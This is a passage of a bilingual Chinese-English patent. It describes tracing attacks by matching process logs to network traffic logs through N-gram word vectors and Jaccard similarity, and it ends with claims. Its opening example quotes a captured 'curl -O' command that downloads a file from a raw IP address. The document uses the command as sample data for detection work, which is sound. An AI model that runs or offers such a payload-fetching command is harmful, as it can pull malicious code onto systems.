cmd_line字段的词向量压缩后变为s1'＝[curlO,Ohttp://213.202.230.103/syn]；The word vector of the cmd_line field becomes s1'=[curlO, Ohttp://213.202.230.103/syn] after compression;

post_line字段的词向量变为s2'＝[...0022,0022curl,curlO,Ohttp://213.202.230.103/syn,http://213.202.230.103/syn...]。The word vector of the post_line field becomes s2'=[...0022,0022curl,curlO,Ohttp://213.202.230.103/syn,http://213.202.230.103/syn...].

步骤S24、计算压缩后词向量的相似度。Step S24, calculating the similarity of the compressed word vectors.

按照

公式来计算杰卡德相似度。计算过程在此不再详述。according to

Formula to calculate Jaccard similarity. The calculation process will not be described in detail here.

步骤S25、将压缩后词向量的相似度，与预设的相似度阈值进行比较；Step S25, comparing the similarity of the compressed word vector with a preset similarity threshold;

步骤S26、若步骤S25的比较结果是大于，则确定进程日志cmd_line字段与流量日志的post_data字段中需要比较的数据范围两者匹配，也就是所选定时间段内两者存在关联关系。Step S26, if the comparison result of step S25 is greater than, then determine that the cmd_line field of the process log matches the data range to be compared in the post_data field of the traffic log, that is, there is a relationship between the two within the selected time period.

基于同一发明构思，本发明实施例还提供了一种攻击溯源的方法，参照图3所示，包括下述步骤：Based on the same inventive concept, the embodiment of the present invention also provides a method for attack source tracing, as shown in Figure 3, including the following steps:

S31、采集同一时间段内产生的至少两份不同类别的攻击溯源数据；S31. Collect at least two pieces of attack source tracing data of different types generated within the same time period;

S32、判断所述至少两份不同类别的攻击溯源数据之间是否匹配；若匹配，则执行下述步骤S33；S32. Determine whether the at least two pieces of attack source tracing data of different categories match; if they match, perform the following step S33;

S33、确定两份不同类别的攻击溯源数据之间存在关联。S33. Determine that there is a relationship between the two pieces of attack source tracing data of different categories.

上述判断至少两份不同类别的攻击溯源数据之间是否匹配的步骤，是通过如前述的攻击溯源数据的处理方法实现的。The above steps of judging whether at least two pieces of attack source tracing data of different types match are realized through the aforementioned processing method of attack source tracing data.

本发明实施例提供的上述攻击溯源的方法，根据前述攻击溯源数据之间的匹配关系，即可判断攻击溯源数据之间存在关联，为进一步地进行漏洞修复、真实性核实、攻击根因分析、影响评估提供支撑。The attack traceability method provided by the embodiment of the present invention can judge that there is a correlation between the attack traceability data according to the matching relationship between the aforementioned attack traceability data, in order to further perform vulnerability repair, authenticity verification, attack root cause analysis, Impact assessments provide support.

为了更直观地展示上述攻击溯源信息的关联性，本发明实施例还提供了一种攻击信息的关联展示方法，参照图4所示，包括：In order to more intuitively display the relevance of the above-mentioned attack source tracing information, an embodiment of the present invention also provides a method for displaying the association of attack information, as shown in Figure 4, including:

S41、确定在同一个时间段内产生的至少两份不同类别的攻击溯源数据，是否存在关联；若存在，则执行S42；S41. Determine whether at least two pieces of attack traceability data of different types generated within the same time period are related; if yes, execute S42;

S42、在攻击溯源图谱上通过预设的关联方式展示所述不同类别的攻击溯源数据的关联关系；S42. On the attack traceability map, display the association relationship of the different types of attack traceability data in a preset association manner;

上述确定在同一个时间段内产生的至少两份不同类别的攻击溯源数据是否存在关联是通过如前述实施例(如图4所示)所述的攻击溯源的方法实现的，具体实施过程在此不再赘述。The above determination of whether at least two different types of attack traceability data generated within the same period of time are related is achieved through the method of attack traceability as described in the foregoing embodiment (as shown in Figure 4), and the specific implementation process is here No longer.

一个攻击溯源图谱展示界面的例子参照图5所示。An example of an attack traceability graph display interface is shown in Figure 5.

参照图5所示，cmd.exe(进程日志代表的节点)和HTTP(网络流量日志代表的节点)之间，在某个时间段内进行上述方法确定两者之间存在关联，则将两者通过线条和箭头的方式连接，用户可点击其中某个节点查看相关的详情，比如日志的时间、节点的类型、名称(HTTP)，源IP、源端口、目的IP、目的端口、攻击方式等等。As shown in Figure 5, between cmd.exe (the node represented by the process log) and HTTP (the node represented by the network traffic log), the above method is performed within a certain period of time to determine that there is an association between the two, and then the two Connected by lines and arrows, users can click one of the nodes to view relevant details, such as log time, node type, name (HTTP), source IP, source port, destination IP, destination port, attack method, etc. .

基于同一发明构思，本发明实施例还提供了一种攻击溯源数据的处理装置、攻击溯源的装置和攻击信息的关联展示装置，由于这些装置所解决问题的原理与前述攻击溯源数据的处理方法、攻击溯源的方法和攻击信息的关联展示方法相似，因此该装置的实施可以参见前述方法的实施，重复之处不再赘述。Based on the same inventive concept, the embodiment of the present invention also provides a processing device for attack traceability data, an attack traceability device, and an associated display device for attack information. The method of attack source tracing is similar to the method of correlating display of attack information, so the implementation of the device can refer to the implementation of the aforementioned method, and the repetition will not be repeated.

本发明实施例提供了一种攻击溯源数据的处理装置，参照图6所示，包括：An embodiment of the present invention provides a processing device for attack traceability data, as shown in FIG. 6 , including:

转换模块61，用于将同一时间段内产生的至少两份不同类别的攻击溯源数据，分别转换成至少两份对应的文本；A conversion module 61, configured to convert at least two pieces of attack source tracing data of different types generated within the same time period into at least two corresponding texts respectively;

比较模块62，用于将至少两份对应的文本进行比较，确定至少两份对应的文本之间的相似度；A comparison module 62, configured to compare at least two corresponding texts to determine the similarity between at least two corresponding texts;

匹配模块63，用于根据所述相似度，确定所述至少两份不同类别的攻击溯源数据之间是否匹配。The matching module 63 is configured to determine whether the at least two pieces of attack source tracing data of different categories match according to the similarity.

本发明实施例提供了一种攻击溯源的装置，参照图7所示，包括：An embodiment of the present invention provides an attack source tracing device, as shown in Figure 7, including:

采集模块71，用于采集同一时间段内产生的至少两份不同类别的攻击溯源数据；A collection module 71, configured to collect at least two pieces of attack traceability data of different types generated within the same time period;

判断模块72，用于判断所述至少两份不同类别的攻击溯源数据之间是否匹配；A judging module 72, configured to judge whether the at least two pieces of attack source tracing data of different categories match;

关联模块73，用于若判断模块判断为匹配时，确定所述两份不同类别的攻击溯源数据之间存在关联；An association module 73, configured to determine that there is an association between the two pieces of attack source tracing data of different types if the judging module judges that they match;

上述判断所述至少两份不同类别的攻击溯源数据之间是否匹配，是通过如前述的攻击溯源数据的处理方法实现的。The above determination of whether the at least two pieces of attack traceability data of different types match is realized through the aforementioned attack traceability data processing method.

本发明实施例提供的一种攻击信息的关联展示装置，参照图8所示，包括：An attack information related display device provided by an embodiment of the present invention, as shown in FIG. 8 , includes:

确定模块81，用于确定在同一个时间段内产生的至少两份不同类别的攻击溯源数据，是否存在关联；A determining module 81, configured to determine whether at least two pieces of attack source tracing data of different types generated within the same time period are related;

关联展示模块82，用于当所述确定模块确定存在关联，则在攻击溯源图上通过预设的关联方式展示所述不同类别的攻击溯源数据的关联关系；The association display module 82 is configured to display the association relationship of the different types of attack source data on the attack source diagram through a preset association method when the determination module determines that there is an association;

所述确定在同一个时间段内产生的至少两份不同类别的攻击溯源数据是否存在关联是通过如前述实施例(如图4所示)所述的攻击信息的溯源方法实现的。The determination of whether at least two pieces of attack traceability data of different types generated within the same time period are related is realized by the traceability method of attack information as described in the foregoing embodiment (as shown in FIG. 4 ).

本发明实施例提供了一种服务器，包括：存储器、处理器及存储于存储器上并可在处理器上运行的计算机程序，所述处理器执行所述程序时实现如前述攻击溯源数据的处理方法，或如前述攻击溯源的方法，或如前述的攻击信息的关联展示方法。An embodiment of the present invention provides a server, including: a memory, a processor, and a computer program stored on the memory and operable on the processor. When the processor executes the program, it implements the processing method of the aforementioned attack traceability data. , or the aforementioned method of attack source tracing, or the aforementioned method of correlating and displaying attack information.

本发明实施例提供了一种计算机可读存储介质，所述计算机可读存储介质存储有计算机程序，所述计算机程序被处理器执行时实现如前述攻击溯源数据的处理方法，或如前述攻击溯源的方法，或如前述的攻击信息的关联展示方法。An embodiment of the present invention provides a computer-readable storage medium, the computer-readable storage medium stores a computer program, and when the computer program is executed by a processor, it implements the processing method of the aforementioned attack source tracing data, or the aforementioned attack source tracing method method, or the associated display method of attack information as described above.

本发明实施例提供了一种计算机程序产品，所述计算机程序产品包括计算机程序，所述计算机程序被处理器执行时实现如前述攻击溯源数据的处理方法，或如前述攻击溯源的方法，或如前述的攻击信息的关联展示方法。An embodiment of the present invention provides a computer program product, the computer program product includes a computer program, and when the computer program is executed by a processor, it implements the aforementioned attack source tracing data processing method, or the aforementioned attack source tracing method, or such as The method for displaying the association of the aforementioned attack information.

关于上述实施例中的攻击溯源数据的处理装置、攻击溯源的装置和攻击信息的关联展示装置，其中各个模块执行操作的具体方式已经在有关该方法的实施例中进行了详细描述，此处将不做详细阐述说明。With regard to the processing device for attack source data, the device for attack source tracing, and the associated display device for attack information in the above-mentioned embodiments, the specific ways in which each module performs operations have been described in detail in the embodiments of the method. Here, No detailed explanation is given.

本领域内的技术人员应明白，本发明的实施例可提供为方法、系统、或计算机程序产品。因此，本发明可采用完全硬件实施例、完全软件实施例、或结合软件和硬件方面的实施例的形式。而且，本发明可采用在一个或多个其中包含有计算机可用程序代码的计算机可用存储介质(包括但不限于磁盘存储器和光学存储器等)上实施的计算机程序产品的形式。Those skilled in the art should understand that the embodiments of the present invention may be provided as methods, systems, or computer program products. Accordingly, the present invention can take the form of an entirely hardware embodiment, an entirely software embodiment, or an embodiment combining software and hardware aspects. Furthermore, the present invention may take the form of a computer program product embodied on one or more computer-usable storage media (including but not limited to disk storage and optical storage, etc.) having computer-usable program code embodied therein.

本发明是参照根据本发明实施例的方法、设备(系统)、和计算机程序产品的流程图和/或方框图来描述的。应理解可由计算机程序指令实现流程图和/或方框图中的每一流程和/或方框、以及流程图和/或方框图中的流程和/或方框的结合。可提供这些计算机程序指令到通用计算机、专用计算机、嵌入式处理机或其他可编程数据处理设备的处理器以产生一个机器，使得通过计算机或其他可编程数据处理设备的处理器执行的指令产生用于实现在流程图一个流程或多个流程和/或方框图一个方框或多个方框中指定的功能的装置。The present invention is described with reference to flowchart illustrations and/or block diagrams of methods, apparatus (systems), and computer program products according to embodiments of the invention. It should be understood that each procedure and/or block in the flowchart and/or block diagram, and a combination of procedures and/or blocks in the flowchart and/or block diagram can be realized by computer program instructions. These computer program instructions may be provided to a general purpose computer, special purpose computer, embedded processor, or processor of other programmable data processing equipment to produce a machine such that the instructions executed by the processor of the computer or other programmable data processing equipment produce a An apparatus for realizing the functions specified in one or more procedures of the flowchart and/or one or more blocks of the block diagram.

这些计算机程序指令也可存储在能引导计算机或其他可编程数据处理设备以特定方式工作的计算机可读存储器中，使得存储在该计算机可读存储器中的指令产生包括指令装置的制造品，该指令装置实现在流程图一个流程或多个流程和/或方框图一个方框或多个方框中指定的功能。These computer program instructions may also be stored in a computer-readable memory capable of directing a computer or other programmable data processing apparatus to operate in a specific manner, such that the instructions stored in the computer-readable memory produce an article of manufacture comprising instruction means, the instructions The device realizes the function specified in one or more procedures of the flowchart and/or one or more blocks of the block diagram.

这些计算机程序指令也可装载到计算机或其他可编程数据处理设备上，使得在计算机或其他可编程设备上执行一系列操作步骤以产生计算机实现的处理，从而在计算机或其他可编程设备上执行的指令提供用于实现在流程图一个流程或多个流程和/或方框图一个方框或多个方框中指定的功能的步骤。These computer program instructions can also be loaded onto a computer or other programmable data processing device, causing a series of operational steps to be performed on the computer or other programmable device to produce a computer-implemented process, thereby The instructions provide steps for implementing the functions specified in the flow chart or blocks of the flowchart and/or the block or blocks of the block diagrams.

显然，本领域的技术人员可以对本发明进行各种改动和变型而不脱离本发明的精神和范围。这样，倘若本发明的这些修改和变型属于本发明权利要求及其等同技术的范围之内，则本发明也意图包含这些改动和变型在内。Obviously, those skilled in the art can make various changes and modifications to the present invention without departing from the spirit and scope of the present invention. Thus, if these modifications and variations of the present invention fall within the scope of the claims of the present invention and their equivalent technologies, the present invention also intends to include these modifications and variations.

Claims

1. A method for processing attack traceability data, comprising:

Convert at least two different types of attack traceability data generated within the same period of time into at least two corresponding texts;

comparing the at least two corresponding texts to determine the degree of similarity between the at least two corresponding texts;

According to the similarity, it is determined whether the at least two pieces of attack source tracing data of different categories match.

2. The method according to claim 1, characterized in that, before converting at least two pieces of attack traceability data of different types generated within the same period of time into at least two corresponding texts, further comprising:

According to the length of the preset time window, the attack source tracing data within the same time window is selected from the at least two different types of attack source tracing data.

3. The method according to claim 1, wherein at least two corresponding texts are compared to determine the degree of similarity between at least two corresponding texts, comprising:

Segmenting the at least two corresponding texts according to preset stop word rules to generate word vectors containing multiple words respectively;

Calculate the similarity between the word vectors, and use the similarity between the word vectors as the similarity between the at least two texts.

4. The method according to claim 3, wherein calculating the similarity between word vectors comprises:

Compress the word vectors separately to obtain compressed word vectors;

Computes the Jaccard similarity between compressed word vectors.

5. The method according to claim 4, wherein the word vector is compressed to obtain the compressed word vector, comprising:

Use the preset N-Gram segmentation method to re-segment the words in the word vector to obtain the compressed word vector.

6. The method according to claim 3, wherein calculating the similarity between word vectors comprises:

Calculate the length of discontinuous matching character strings between the word vectors, and use the length of the discontinuous matching character strings as the similarity between the word vectors.

7. A method for tracing the source of an attack, comprising:

Collect at least two different types of attack traceability data generated within the same period of time;

judging whether the at least two pieces of attack source tracing data of different categories match;

If they match, it is determined that there is a relationship between the two pieces of attack source tracing data of different categories;

The step of judging whether the at least two pieces of attack traceability data of different types match is realized by the method for processing attack traceability data according to any one of claims 1-6.

8. A method for correlating and displaying attack information, comprising:

Determine whether at least two pieces of attack traceability data of different types generated in the same time period are related;

If it exists, display the relationship between the different types of attack source data on the attack source graph through a preset association method;

The step of determining whether at least two pieces of attack source tracing data of different types generated in the same time period are related is realized by the attack source tracing method as claimed in claim 7 .

9. A processing device for attack traceability data, characterized in that it includes:

The conversion module is used to convert at least two different types of attack traceability data generated in the same period of time into at least two corresponding texts;

A comparison module, configured to compare at least two corresponding texts and determine the similarity between at least two corresponding texts;

A matching module, configured to determine whether the at least two pieces of attack source tracing data of different categories match according to the similarity.

10. An attack source tracing device, comprising:

The collection module is used to collect at least two different types of attack traceability data generated within the same time period;

A judging module, configured to judge whether the at least two pieces of attack source tracing data of different categories match;

An association module, configured to determine that there is an association between the two pieces of attack traceability data of different categories if the judging module judges that they match;

The judging whether the at least two pieces of attack traceability data of different types match is realized by the processing method of attack traceability data according to any one of claims 1-6.

11. A server, characterized in that it comprises: a memory, a processor, and a computer program stored on the memory and operable on the processor, when the processor executes the program, it implements attack source tracing according to claims 1-6 The data processing method, or the attack source tracing method according to claim 7, or the attack information association display method according to claim 8.

12. A computer-readable storage medium, characterized in that the computer-readable storage medium stores a computer program, and when the computer program is executed by a processor, it implements the processing method for attacking traceability data according to claims 1-6, or The attack source tracing method according to claim 7, or the attack information association display method according to claim 8.

13. A computer program product, characterized in that the computer program product includes a computer program, and when the computer program is executed by a processor, it implements the processing method for attacking traceability data according to claims 1-6, or as claimed in claim 7 The attack source tracing method described above, or the attack information association display method described in claim 8.